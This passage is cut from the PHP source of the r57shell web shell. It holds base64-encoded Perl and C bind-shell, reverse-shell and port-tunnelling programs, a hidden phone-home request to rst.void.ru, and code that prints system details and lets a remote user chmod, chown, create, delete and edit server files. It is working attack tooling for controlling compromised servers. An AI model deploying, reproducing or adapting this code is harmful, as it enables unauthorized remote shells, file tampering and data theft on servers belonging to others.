+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV +TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG +lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK +Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i +Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N +lIENPTk47DQpleGl0IDA7DQp9DQp9"; +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj +aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR +hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT +sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI +kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi +KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl +OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; +$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC +BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb +SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd +KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ +sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC +Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D +QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp +Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; +$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2 +x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb +HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj +aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ +lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm +xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga +W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy +LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV +udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow +0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb +iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l +KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA +gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS +hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC +iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh +ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ +vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC +AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D +QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh +ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0 +gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay +wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c +29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy +MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA +gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci +5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ +HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu +dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0 +KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC +ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI +E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp +Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs +NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG +J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL +CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp +dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo +gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm +lsZSk7DQogIHJldHVybiAwOw0KfQ=="; +$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I +CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl +bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU +gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol +NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC +iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy +aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ +SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2 +xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ +WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN +CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9 +yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi +I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc +m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp +IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ +lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW +QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK +CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g +c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0 +NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG +UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I +DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs +ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J +1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo="; +$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2 +JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l +lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW +FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L +3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr +J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR +oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj +xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO +i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv +dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB +ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2 +hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg=="; +$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh +IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl +hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz +tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa +XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u +8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV +ybmV0LS0+"; +echo $head; +echo '</head>'; +if(empty($_POST['cmd'])) { +$serv = array(127,192,172,10); +$addr=@explode('.', $_SERVER['SERVER_ADDR']); +$current_version = str_replace('.','',$version); +if (!in_array($addr[0], $serv)) { +@print "<img src=\"http://rst.void.ru/r57shell_version/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>"; +@readfile ("http://rst.void.ru/r57shell_version/version.php?version=".$current_version."");}} +echo '<body bgcolor="#e4e0d8"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(1).'&nbsp; +<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b> +</font></td><td bgcolor=#cccccc><font face=Verdana size=-2>'; +echo ws(2); +echo "<b>".date ("d-m-Y H:i:s")."</b>"; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>"; +echo ws(2); +echo (($safe_mode)?("safe_mode: <b><font color=green>ON</font></b>"):("safe_mode: <b><font color=red>OFF</font></b>")); +echo ws(2); +echo "PHP version: <b>".@phpversion()."</b>"; +$curl_on = @function_exists('curl_version'); +echo ws(2); +echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>")); +echo ws(2); +echo "MySQL: <b>"; +$mysql_on = @function_exists('mysql_connect'); +if($mysql_on){ +echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; } +echo ws(2); +echo "MSSQL: <b>"; +$mssql_on = @function_exists('mssql_connect'); +if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo ws(2); +echo "PostgreSQL: <b>"; +$pg_on = @function_exists('pg_connect'); +if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo ws(2); +echo "Oracle: <b>"; +$ora_on = @function_exists('ocilogon'); +if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo "<br>".ws(2); +echo "Disable functions : <b>"; +if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} +$free = @diskfreespace($dir); +if (!$free) {$free = 0;} +$all = @disk_total_space($dir); +if (!$all) {$all = 0;} +$used = $all-$free; +$used_percent = @round(100/($all/$free),2); +echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>"; +echo '</font></td></tr><table> +<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td align=right width=100>'; +echo $font; +if(!$windows){ +echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=-2 color=red><b>"; +$uname = ex('uname -a'); +echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>")); +if(!$safe_mode){ +$bsd1 = ex('sysctl -n kern.ostype'); +$bsd2 = ex('sysctl -n kern.osrelease'); +$lin1 = ex('sysctl -n kernel.ostype'); +$lin2 = ex('sysctl -n kernel.osrelease'); +} +if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; } +else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; } +else { $sysctl = "-"; } +echo ws(3).$sysctl."<br>"; +echo ws(3).ex('echo $OSTYPE')."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +$id = ex('id'); +echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>")); +echo ws(3).$dir; +echo "</b></font>"; +} +else +{ +echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=-2 color=red><b>"; +echo ws(3).@substr(@php_uname(),0,120)."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +echo ws(3).@get_current_user()."<br>"; +echo ws(3).$dir."<br>"; +echo "</font>"; +} +echo "</font>"; +echo "</td></tr></table>"; +if(empty($c1)||empty($c2)) { die(); } +$f = '<br>'; +$f .= base64_decode($c1); +$f .= base64_decode($c2); +if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text") +{ +$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\''; +} +if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_") + { + switch($_POST['what']) + { + case 'own': + @chown($_POST['param1'],$_POST['param2']); + break; + case 'grp': + @chgrp($_POST['param1'],$_POST['param2']); + break; + case 'mod': + @chmod($_POST['param1'],intval($_POST['param2'], 8)); + break; + } + $_POST['cmd']=""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="mk") + { + switch($_POST['what']) + { + case 'file': + if($_POST['action'] == "create") + { + if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; } + else { + fclose($file); + $_POST['e_name'] = $_POST['mk_name']; + $_POST['cmd']="edit_file"; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>"; + } + } + else if($_POST['action'] == "delete") + { + if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + case 'dir': + if($_POST['action'] == "create"){ + if(mkdir($_POST['mk_name'])) + { + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>"; + } + else { echo ce($_POST['mk_name']); $_POST['cmd']=""; } + } + else if($_POST['action'] == "delete"){ + if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file") + { + if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); } + if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; } + else { + echo $table_up3; + echo $font; + echo "<form name=save_file method=post>"; + echo ws(3)."<b>".$_POST['e_name']."</b>"; + echo "<div align=center><textarea name=e_text cols=121 rows=24>"; + echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name']))); + fclose($file); + echo "</textarea>"; + echo "<input type=hidden name=e_name value=".$_POST['e_name'].">"; + echo "<input type=hidden name=dir value=".$dir.">"; + echo "<input type=hidden name=cmd value=save_file>"; + echo 